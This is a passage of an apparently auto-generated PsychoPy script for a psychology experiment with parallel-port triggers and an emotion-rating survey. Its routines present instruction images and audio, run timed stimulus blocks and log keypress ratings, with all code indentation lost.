# Initialize components for Routine "task_introduction"
task_introductionClock = core.Clock()
task_intro_image = visual.ImageStim(
win=win, name='task_intro_image',
image=None, mask=None,
ori=0, pos=[0, 0], size=None,
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=0.0)
task_intro_sound = sound.Sound(u'A', secs=-1)
task_intro_sound.setVolume(1)
# Initialize components for Routine "instructions"
instructionsClock = core.Clock()
inst_image = visual.ImageStim(
win=win, name='inst_image',
image=None, mask=None,
ori=0, pos=[0, 0], size=None,
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=0.0)
inst_sound = sound.Sound(u'A', secs=-1)
inst_sound.setVolume(1)
inst_repeat = 0
# Initialize components for Routine "task"
taskClock = core.Clock()
task_image = visual.ImageStim(
win=win, name='task_image',
image=None, mask=None,
ori=0, pos=[0, 0], size=None,
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=0.0)
# Initialize components for Routine "relax"
relaxClock = core.Clock()
relax_image = visual.ImageStim(
win=win, name='relax_image',
image="Instructions/png/r-0.png", mask=None,
ori=0, pos=[0, 0], size=None,
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=0.0)
relax_sound = sound.Sound(u'A', secs=-1)
relax_sound.setVolume(1)
# Initialize components for Routine "survey"
surveyClock = core.Clock()
survey_image = visual.ImageStim(
win=win, name='survey_image',
image=None, mask=None,
ori=0, pos=[0, 0], size=None,
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=0.0)
# Initialize components for Routine "block_finish"
block_finishClock = core.Clock()
block_finish_image = visual.ImageStim(
win=win, name='block_finish_image',
image=None, mask=None,
ori=0, pos=[0, 0], size=None,
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=0.0)
block_finish_sound = sound.Sound(u'A', secs=-1)
block_finish_sound.setVolume(1)
bf_repeat = 0
# Initialize components for Routine "Finish"
FinishClock = core.Clock()
finish_image = visual.ImageStim(
win=win, name='finish_image',
image="Instructions/png/finish-0.png", mask=None,
ori=0, pos=[0, 0], size=None,
color=[1.000,1.000,1.000], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=0.0)
finish_sound = sound.Sound(u'A', secs=-1)
finish_sound.setVolume(1)
# Create some handy timers
globalClock = core.Clock() # to track the time since experiment started
routineTimer = core.CountdownTimer() # to track time remaining of each (non-slip) routine
# set up handler to look after randomisation of conditions etc
intro_loop = data.TrialHandler(nReps=10, method='sequential',
extraInfo=expInfo, originPath=-1,
trialList=[None],
seed=None, name='prac_intro_loop')
thisExp.addLoop(intro_loop) # add the loop to the experiment
thisIntro_loop = intro_loop.trialList[0] # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisIntro_loop.rgb)
if thisIntro_loop != None:
for paramName in thisIntro_loop.keys():
exec(paramName + '= thisIntro_loop.' + paramName)
for thisIntro_loop in intro_loop:
currentLoop = intro_loop
# abbreviate parameter names if possible (e.g. rgb = thisIntro_loop.rgb)
if thisIntro_loop != None:
for paramName in thisIntro_loop.keys():
exec(paramName + '= thisIntro_loop.' + paramName)
# ------Prepare to start Routine "introduction"-------
t = 0
introductionClock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
intro_key = event.BuilderKeyResponse()
intro_image.setImage("Instructions/png/int-%s.png"%(intro_repeat))
intro_sound.setSound("Instructions/wav/int-%s.wav"%(intro_repeat))
# keep track of which components have finished
introductionComponents = [intro_image, intro_key, intro_sound]
for thisComponent in introductionComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "introduction"-------
while continueRoutine:
# get current time
t = introductionClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *intro_image* updates
if t >= 0.0 and intro_image.status == NOT_STARTED:
# keep track of start time/frame for later
intro_image.tStart = t
intro_image.frameNStart = frameN # exact frame index
intro_image.setAutoDraw(True)
# *intro_key* updates
if t >= 0.0 and intro_key.status == NOT_STARTED:
# keep track of start time/frame for later
intro_key.tStart = t
intro_key.frameNStart = frameN # exact frame index
intro_key.status = STARTED
# keyboard checking is just starting
event.clearEvents(eventType='keyboard')
if intro_key.status == STARTED:
theseKeys = event.getKeys(keyList=['space'])
# check for quit:
if "escape" in theseKeys:
endExpNow = True
if len(theseKeys) > 0: # at least one key was pressed
# a response ends the routine
continueRoutine = False
# start/stop intro_sound
if t >= 0.0 and intro_sound.status == NOT_STARTED:
# keep track of start time/frame for later
intro_sound.tStart = t
intro_sound.frameNStart = frameN # exact frame index
intro_sound.play() # start the sound (it finishes automatically)
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in introductionComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "introduction"-------
for thisComponent in introductionComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
intro_sound.stop() # ensure sound has stopped at end of routine
intro_repeat = intro_repeat+1
# the Routine "introduction" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# completed 10 repeats of 'intro_loop'
# set up handler to look after randomisation of conditions etc
prac_block = data.TrialHandler(nReps=2, method='sequential',
extraInfo=expInfo, originPath=-1,
trialList=[None],
seed=None, name='block')
thisExp.addLoop(prac_block) # add the loop to the experiment
thisPrac_block = prac_block.trialList[0] # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisPrac_block.rgb)
if thisPrac_block != None:
for paramName in thisPrac_block.keys():
exec(paramName + '= thisPrac_block.' + paramName)
for thisPrac_block in prac_block:
currentLoop = prac_block
# abbreviate parameter names if possible (e.g. rgb = thisPrac_block.rgb)
if thisPrac_block != None:
for paramName in thisPrac_block.keys():
exec(paramName + '= thisPrac_block.' + paramName)
# set up handler to look after randomisation of conditions etc
prac_inst_loop = data.TrialHandler(nReps=3, method='sequential',
extraInfo=expInfo, originPath=-1,
trialList=[None],
seed=None, name='inst_loop')
thisExp.addLoop(prac_inst_loop) # add the loop to the experiment
thisPrac_inst_loop = prac_inst_loop.trialList[0] # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisPrac_inst_loop.rgb)
if thisPrac_inst_loop != None:
for paramName in thisPrac_inst_loop.keys():
exec(paramName + '= thisPrac_inst_loop.' + paramName)
for thisPrac_inst_loop in prac_inst_loop:
currentLoop = prac_inst_loop
# abbreviate parameter names if possible (e.g. rgb = thisPrac_inst_loop.rgb)
if thisPrac_inst_loop != None:
for paramName in thisPrac_inst_loop.keys():
exec(paramName + '= thisPrac_inst_loop.' + paramName)
# ------Prepare to start Routine "instructions"-------
t = 0
instructionsClock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
inst_key = event.BuilderKeyResponse()
inst_image.setImage("Instructions/png/pi-%s.png"%(inst_repeat))
#prevent loading of inst_sound for pi-0 and pi-2
if not (inst_repeat== 0 or inst_repeat== 3):
inst_sound.setSound("Instructions/wav/pi-%s.wav"%(inst_repeat))
instructionsComponents = [inst_image, inst_key, inst_sound]
else:
# keep track of which components have finished
instructionsComponents = [inst_image, inst_key]
for thisComponent in instructionsComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "instructions"-------
while continueRoutine:
# get current time
t = instructionsClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *inst_image* updates
if t >= 0.0 and inst_image.status == NOT_STARTED:
# keep track of start time/frame for later
inst_image.tStart = t
inst_image.frameNStart = frameN # exact frame index
inst_image.setAutoDraw(True)
# *inst_key* updates
if t >= 0.0 and inst_key.status == NOT_STARTED:
# keep track of start time/frame for later
inst_key.tStart = t
inst_key.frameNStart = frameN # exact frame index
inst_key.status = STARTED
# keyboard checking is just starting
event.clearEvents(eventType='keyboard')
if inst_key.status == STARTED:
theseKeys = event.getKeys(keyList=['space'])
# check for quit:
if "escape" in theseKeys:
endExpNow = True
if len(theseKeys) > 0: # at least one key was pressed
# a response ends the routine
continueRoutine = False
#prevent loading of inst_sound for pi-0 and pi-2
if not (inst_repeat== 0 or inst_repeat== 3):
# start/stop inst_sound
if t >= 0.0 and inst_sound.status == NOT_STARTED:
# keep track of start time/frame for later
inst_sound.tStart = t
inst_sound.frameNStart = frameN # exact frame index
inst_sound.play() # start the sound (it finishes automatically)
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in instructionsComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "instructions"-------
for thisComponent in instructionsComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
#prevent loading of inst_sound for pi-0 and pi-2
if not (inst_repeat== 0 or inst_repeat== 3):
inst_sound.stop() # ensure sound has stopped at end of routine
inst_repeat = inst_repeat+1
# the Routine "instructions" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# completed 2 repeats of 'prac_inst_loop'
# ------Prepare to start Routine "task"-------
t = 0
t_0 = 0
t_1 = 0
taskClock.reset() # clock
frameN = -1
continueRoutine = True
routineTimer.add(stim_duration)
# update component parameters for each repeat
# keep track of which components have finished
taskComponents = [task_image]
for thisComponent in taskComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "task"-------
while continueRoutine and routineTimer.getTime() > 0:
# get current time
t = taskClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *task_image* updates
if t >= 0.0 and task_image.status == NOT_STARTED:
# keep track of start time/frame for later
task_image.tStart = t
task_image.frameNStart = frameN # exact frame index
task_image.setAutoDraw(True)
frameRemains = 0.0 + stim_duration- win.monitorFramePeriod * 0.75 # most of one frame period left
if task_image.status == STARTED and t >= frameRemains:
task_image.setAutoDraw(False)
#task trigger
t = taskClock.getTime()
t_1 = t
pport.setData(int(0))
if (t_1 - t_0) >= .500:
pport.setData(int(prac_ttl))
t_0 = t
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in taskComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "task"-------
for thisComponent in taskComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
# set up handler to look after randomisation of conditions etc
prac_relax_loop = data.TrialHandler(nReps=2, method='sequential',
extraInfo=expInfo, originPath=-1,
trialList=[None],
seed=None, name='relax_loop')
thisExp.addLoop(prac_relax_loop) # add the loop to the experiment
thisPrac_relax_loop = prac_relax_loop.trialList[0] # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisPrac_relax_loop.rgb)
if thisPrac_relax_loop != None:
for paramName in thisPrac_relax_loop.keys():
exec(paramName + '= thisPrac_relax_loop.' + paramName)
relax_repeat = 0
for thisPrac_relax_loop in prac_relax_loop:
currentLoop = prac_relax_loop
# abbreviate parameter names if possible (e.g. rgb = thisPrac_relax_loop.rgb)
if thisPrac_relax_loop != None:
for paramName in thisPrac_relax_loop.keys():
exec(paramName + '= thisPrac_relax_loop.' + paramName)
# ------Prepare to start Routine "relax"-------
t = 0
relaxClock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
relax_key = event.BuilderKeyResponse()
relax_image.setImage("Instructions/png/r-%s.png"%(relax_repeat))
relax_sound.setSound("Instructions/wav/r-%s.wav"%(relax_repeat))
# keep track of which components have finished
relaxComponents = [relax_image, relax_key, relax_sound]
for thisComponent in relaxComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "relax"-------
while continueRoutine:
# get current time
t = relaxClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *relax_image* updates
if t >= 0.0 and relax_image.status == NOT_STARTED:
# keep track of start time/frame for later
relax_image.tStart = t
relax_image.frameNStart = frameN # exact frame index
relax_image.setAutoDraw(True)
# *relax_key* updates
if t >= 0.0 and relax_key.status == NOT_STARTED:
# keep track of start time/frame for later
relax_key.tStart = t
relax_key.frameNStart = frameN # exact frame index
relax_key.status = STARTED
# keyboard checking is just starting
event.clearEvents(eventType='keyboard')
if relax_key.status == STARTED:
theseKeys = event.getKeys(keyList=['space'])
# check for quit:
if "escape" in theseKeys:
endExpNow = True
if len(theseKeys) > 0: # at least one key was pressed
# a response ends the routine
continueRoutine = False
# start/stop relax_sound
if t >= 0.0 and relax_sound.status == NOT_STARTED:
# keep track of start time/frame for later
relax_sound.tStart = t
relax_sound.frameNStart = frameN # exact frame index
relax_sound.play() # start the sound (it finishes automatically)
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in relaxComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "relax"-------
for thisComponent in relaxComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
relax_sound.stop() # ensure sound has stopped at end of routine
relax_repeat = relax_repeat+1
# the Routine "relax" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# completed 2 repeats of 'prac_relax_loop'
# set up handler to look after randomisation of conditions etc
prac_survey_loop = data.TrialHandler(nReps=7, method='random',
extraInfo=expInfo, originPath=-1,
trialList=[None],
seed=None, name='survey_loop')
thisExp.addLoop(prac_survey_loop) # add the loop to the experiment
thisPrac_survey_loop = prac_survey_loop.trialList[0] # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisPrac_survey_loop.rgb)
if thisPrac_survey_loop != None:
for paramName in thisPrac_survey_loop.keys():
exec(paramName + '= thisPrac_survey_loop.' + paramName)
#reset survey
lsurvey = ['anger','discomfort','disgust','fear','happiness','interest','sadness']#list of questions types
random.shuffle(lsurvey)
print(lsurvey)
for thisPrac_survey_loop in prac_survey_loop:
currentLoop = prac_survey_loop
# abbreviate parameter names if possible (e.g. rgb = thisPrac_survey_loop.rgb)
if thisPrac_survey_loop != None:
for paramName in thisPrac_survey_loop.keys():
exec(paramName + '= thisPrac_survey_loop.' + paramName)
# ------Prepare to start Routine "survey"-------
t = 0
surveyClock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
survey_key = event.BuilderKeyResponse()
surveyType = lsurvey.pop(0)
survey_image.setImage("Instructions/png/%s.png"%(surveyType))
# keep track of which components have finished
surveyComponents = [survey_image, survey_key]
for thisComponent in surveyComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "survey"-------
while continueRoutine:
# get current time
t = surveyClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *survey_image* updates
if t >= 0.0 and survey_image.status == NOT_STARTED:
# keep track of start time/frame for later
survey_image.tStart = t
survey_image.frameNStart = frameN # exact frame index
survey_image.setAutoDraw(True)
# *survey_key* updates
if t >= 0.0 and survey_key.status == NOT_STARTED:
# keep track of start time/frame for later
survey_key.tStart = t
survey_key.frameNStart = frameN # exact frame index
survey_key.status = STARTED
# keyboard checking is just starting
win.callOnFlip(survey_key.clock.reset) # t=0 on next screen flip
event.clearEvents(eventType='keyboard')
if survey_key.status == STARTED:
theseKeys = event.getKeys(keyList=numpad_list)
# check for quit:
if "escape" in theseKeys:
endExpNow = True
if len(theseKeys) > 0: # at least one key was pressed
if survey_key.keys == []: # then this was the first keypress
survey_key.keys = theseKeys[0] # just the first key pressed
survey_key.rt = survey_key.clock.getTime()
# a response ends the routine
continueRoutine = False
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in surveyComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "survey"-------
for thisComponent in surveyComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
# check responses
if survey_key.keys in ['', [], None]: # No response was made
survey_key.keys=None
prac_survey_loop.addData('survey_key.keys',survey_key.keys)
if survey_key.keys != None: # we had a response
prac_survey_loop.addData('survey_key.rt', survey_key.rt)
# the Routine "survey" was not non-slip safe, so reset the non-slip timer
prac_survey_loop.addData('surveyType', surveyType)
prac_survey_loop.addData('blockType', 'pb%s'%(prac_ttl-1))
routineTimer.reset()
thisExp.nextEntry()
print(survey_key.keys)
# completed 7 repeats of 'prac_survey_loop'
# ------Prepare to start Routine "block_finish"-------
t = 0
block_finishClock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
block_finish_key = event.BuilderKeyResponse()
block_finish_image.setImage("Instructions/png/bf-%s.png"%(bf_repeat))
block_finish_sound.setSound("Instructions/wav/bf-%s.wav"%(bf_repeat))
# keep track of which components have finished
block_finishComponents = [block_finish_image, block_finish_key, block_finish_sound]
for thisComponent in block_finishComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "block_finish"-------
while continueRoutine:
# get current time
t = block_finishClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *block_finish_image* updates
if t >= 0.0 and block_finish_image.status == NOT_STARTED:
# keep track of start time/frame for later
block_finish_image.tStart = t
block_finish_image.frameNStart = frameN # exact frame index
block_finish_image.setAutoDraw(True)
# *block_finish_key* updates
if t >= 0.0 and block_finish_key.status == NOT_STARTED:
# keep track of start time/frame for later
block_finish_key.tStart = t
block_finish_key.frameNStart = frameN # exact frame index
block_finish_key.status = STARTED
# keyboard checking is just starting
event.clearEvents(eventType='keyboard')
if block_finish_key.status == STARTED:
theseKeys = event.getKeys(keyList=['space'])
# check for quit:
if "escape" in theseKeys:
endExpNow = True
if len(theseKeys) > 0: # at least one key was pressed
# a response ends the routine
continueRoutine = False
# start/stop block_finish_sound
if t >= 0.0 and block_finish_sound.status == NOT_STARTED:
# keep track of start time/frame for later
block_finish_sound.tStart = t
block_finish_sound.frameNStart = frameN # exact frame index
block_finish_sound.play() # start the sound (it finishes automatically)
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in block_finishComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "block_finish"-------
for thisComponent in block_finishComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
block_finish_sound.stop() # ensure sound has stopped at end of routine
bf_repeat = bf_repeat+1
# the Routine "block_finish" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
prac_ttl = prac_ttl + 1
# completed 2 repeats of 'prac_block'
inst_repeat = 0 #reset
intro_repeat = 0 #reset
# set up handler to look after randomisation of conditions etc
task_intro_loop = data.TrialHandler(nReps=5, method='sequential',
extraInfo=expInfo, originPath=-1,
trialList=[None],
seed=None, name='task_intro_loop')
thisExp.addLoop(task_intro_loop) # add the loop to the experiment
thisTask_intro_loop = task_intro_loop.trialList[0] # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisTask_intro_loop.rgb)
if thisTask_intro_loop != None:
for paramName in thisTask_intro_loop.keys():
exec(paramName + '= thisTask_intro_loop.' + paramName)
for thisTask_intro_loop in task_intro_loop:
currentLoop = task_intro_loop
# abbreviate parameter names if possible (e.g. rgb = thisTask_intro_loop.rgb)
if thisTask_intro_loop != None:
for paramName in thisTask_intro_loop.keys():
exec(paramName + '= thisTask_intro_loop.' + paramName)
# ------Prepare to start Routine "task_introduction"-------
t = 0
task_introductionClock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
task_intro_key = event.BuilderKeyResponse()
task_intro_image.setImage("Instructions/png/tintro-%s.png"%(intro_repeat))
task_intro_sound.setSound("Instructions/wav/tintro-%s.wav"%(intro_repeat))
# keep track of which components have finished
task_introductionComponents = [task_intro_image, task_intro_key, task_intro_sound]
for thisComponent in task_introductionComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "task_introduction"-------
while continueRoutine:
# get current time
t = task_introductionClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *task_intro_image* updates
if t >= 0.0 and task_intro_image.status == NOT_STARTED:
# keep track of start time/frame for later
task_intro_image.tStart = t
task_intro_image.frameNStart = frameN # exact frame index
task_intro_image.setAutoDraw(True)
# *task_intro_key* updates
if t >= 0.0 and task_intro_key.status == NOT_STARTED:
# keep track of start time/frame for later
task_intro_key.tStart = t
task_intro_key.frameNStart = frameN # exact frame index
task_intro_key.status = STARTED
# keyboard checking is just starting
event.clearEvents(eventType='keyboard')
if task_intro_key.status == STARTED:
theseKeys = event.getKeys(keyList=['space'])
# check for quit:
if "escape" in theseKeys:
endExpNow = True
if len(theseKeys) > 0: # at least one key was pressed
# a response ends the routine
continueRoutine = False
# start/stop task_intro_sound
if t >= 0.0 and task_intro_sound.status == NOT_STARTED:
# keep track of start time/frame for later
task_intro_sound.tStart = t
task_intro_sound.frameNStart = frameN # exact frame index
task_intro_sound.play() # start the sound (it finishes automatically)
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in task_introductionComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "task_introduction"-------
for thisComponent in task_introductionComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
task_intro_sound.stop() # ensure sound has stopped at end of routine
intro_repeat = intro_repeat+1
# the Routine "task_introduction" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# completed 5 repeats of 'task_intro_loop'
# set up handler to look after randomisation of conditions etc
task_block = data.TrialHandler(nReps=4, method='random',
extraInfo=expInfo, originPath=-1,
trialList=[None],
seed=None, name='block')
thisExp.addLoop(task_block) # add the loop to the experiment
thisTask_block = task_block.trialList[0] # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisTask_block.rgb)
if thisTask_block != None:
for paramName in thisTask_block.keys():
exec(paramName + '= thisTask_block.' + paramName)
#---------------block loop
#create block list and shuffle
#list of block types, instruction slides, and ttls
lblockType = [['b0',7,3],['b1',6,4],['b2',7,5],['b3',8,6]]
random.shuffle(lblockType)
blockNum=0 #block counter
for thisTask_block in task_block:
#get block type then pop list
blockType = lblockType.pop(0)
#get ttl
ttlNum = blockType[2]
#print
print 'blockType:',blockType[0]
print 'blockNum:',blockNum
#loop
currentLoop = task_block
# abbreviate parameter names if possible (e.g. rgb = thisTask_block.rgb)
if thisTask_block != None:
for paramName in thisTask_block.keys():
exec(paramName + '= thisTask_block.' + paramName)
# set up handler to look after randomisation of conditions etc
task_inst_loop = data.TrialHandler(nReps=blockType[1], method='sequential',
extraInfo=expInfo, originPath=-1,
trialList=[None],
seed=None, name='inst_loop')
thisExp.addLoop(task_inst_loop) # add the loop to the experiment
thisTask_inst_loop = task_inst_loop.trialList[0] # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisTask_inst_loop.rgb)
if thisTask_inst_loop != None:
for paramName in thisTask_inst_loop.keys():
exec(paramName + '= thisTask_inst_loop.' + paramName)
inst_repeat = 0
#---------------task instructions loop
for thisTask_inst_loop in task_inst_loop:
currentLoop = task_inst_loop
# abbreviate parameter names if possible (e.g. rgb = thisTask_inst_loop.rgb)
if thisTask_inst_loop != None:
for paramName in thisTask_inst_loop.keys():
exec(paramName + '= thisTask_inst_loop.' + paramName)
# ------Prepare to start Routine "instructions"-------
t = 0
instructionsClock.reset() # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
inst_key = event.BuilderKeyResponse()
inst_image.setImage("Instructions/png/%s-%s.png"%(blockType[0],inst_repeat))
#prevent loading of inst_sound for first slide
if not (inst_repeat== 0):
inst_sound.setSound("Instructions/wav/%s-%s.wav"%(blockType[0],inst_repeat))
instructionsComponents = [inst_image, inst_key, inst_sound]
else:
instructionsComponents = [inst_image, inst_key]
for thisComponent in instructionsComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "instructions"-------
while continueRoutine:
# get current time
t = instructionsClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *inst_image* updates
if t >= 0.0 and inst_image.status == NOT_STARTED:
# keep track of start time/frame for later
inst_image.tStart = t
inst_image.frameNStart = frameN # exact frame index
inst_image.setAutoDraw(True)
# *inst_key* updates
if t >= 0.0 and inst_key.status == NOT_STARTED:
# keep track of start time/frame for later
inst_key.tStart = t
inst_key.frameNStart = frameN # exact frame index
inst_key.status = STARTED
# keyboard checking is just starting
event.clearEvents(eventType='keyboard')
if inst_key.status == STARTED:
theseKeys = event.getKeys(keyList=['space'])
# check for quit:
if "escape" in theseKeys:
endExpNow = True
if len(theseKeys) > 0: # at least one key was pressed
# a response ends the routine
continueRoutine = False
#prevent loading of inst_sound for first slide
if not (inst_repeat== 0):
# start/stop inst_sound
if t >= 0.0 and inst_sound.status == NOT_STARTED:
# keep track of start time/frame for later
inst_sound.tStart = t
inst_sound.frameNStart = frameN # exact frame index
inst_sound.play() # start the sound (it finishes automatically)
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in instructionsComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "instructions"-------
for thisComponent in instructionsComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
#prevent loading of inst_sound for first slide
if not (inst_repeat== 0):
inst_sound.stop() # ensure sound has stopped at end of routine
inst_repeat = inst_repeat+1
# the Routine "instructions" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# completed 5 repeats of 'task_inst_loop'
# ------Prepare to start Routine "task"-------
t = 0
t_0 = 0
t_1 = 0
taskClock.reset() # clock
frameN = -1
continueRoutine = True
routineTimer.add(stim_duration)
# update component parameters for each repeat
# keep track of which components have finished
taskComponents = [task_image]
for thisComponent in taskComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "task"-------
while continueRoutine and routineTimer.getTime() > 0:
# get current time
t = taskClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *task_image* updates
if t >= 0.0 and task_image.status == NOT_STARTED:
# keep track of start time/frame for later
task_image.tStart = t
task_image.frameNStart = frameN # exact frame index
task_image.setAutoDraw(True)
frameRemains = 0.0 + stim_duration- win.monitorFramePeriod * 0.75 # most of one frame period left
if task_image.status == STARTED and t >= frameRemains:
task_image.setAutoDraw(False)
#task trigger
t = taskClock.getTime()
t_1 = t
pport.setData(int(0))
if (t_1 - t_0) >= .500:
pport.setData(int(ttlNum))
t_0 = t
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in taskComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "task"-------
for thisComponent in taskComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
# set up handler to look after randomisation of conditions etc
task_relax_loop = data.TrialHandler(nReps=2, method='random',
extraInfo=expInfo, originPath=-1,
trialList=[None],
seed=None, name='relax_loop')
